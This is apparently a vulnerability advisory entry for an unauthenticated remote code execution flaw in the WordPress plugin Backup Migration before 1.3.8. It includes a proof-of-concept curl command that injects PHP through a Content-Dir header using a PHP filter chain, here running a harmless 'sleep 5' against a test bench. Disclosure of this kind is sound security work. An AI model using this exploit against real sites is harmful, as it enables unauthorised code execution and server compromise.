Lucene search

K
wpexploitWpvulndbWPEX-ID:6A4D0AF9-E1CD-4A69-A56C-3C009E207ECA
HistoryDec 12, 2023 - 12:00 a.m.

Backup Migration < 1.3.8 - Unauthenticated RCE

2023-12-1200:00:00
wpvulndb
78
backup migration
unauthenticated rce
php filter chain generator
vulnerability
exploit
curl command
github
synacktiv
time-based payload

AI Score

10

Confidence

High

EPSS

0.948

Percentile

99.3%

Description The plugin is vulnerable to Remote Code Execution via the /includes/backup-heart.php file. This is due to an attacker being able to control the values passed to an include, and subsequently leverage that to achieve remote code execution. This makes it possible for unauthenticated attackers to easily execute code on the server.

Using the PHP Filter Chain Generator: https://github.com/synacktiv/php_filter_chain_generator

time curl -X POST http://wpscan-vulnerability-test-bench.ddev.site/wp-content/plugins/backup-backup/includes/backup-heart.php -H "Content-Dir: `python3 ./php_filter_chain_generator.py --chain '<?php system("sleep 5"); ?>' | grep --color=never '^php://filter'`"

AI Score

10

Confidence

High

EPSS

0.948

Percentile

99.3%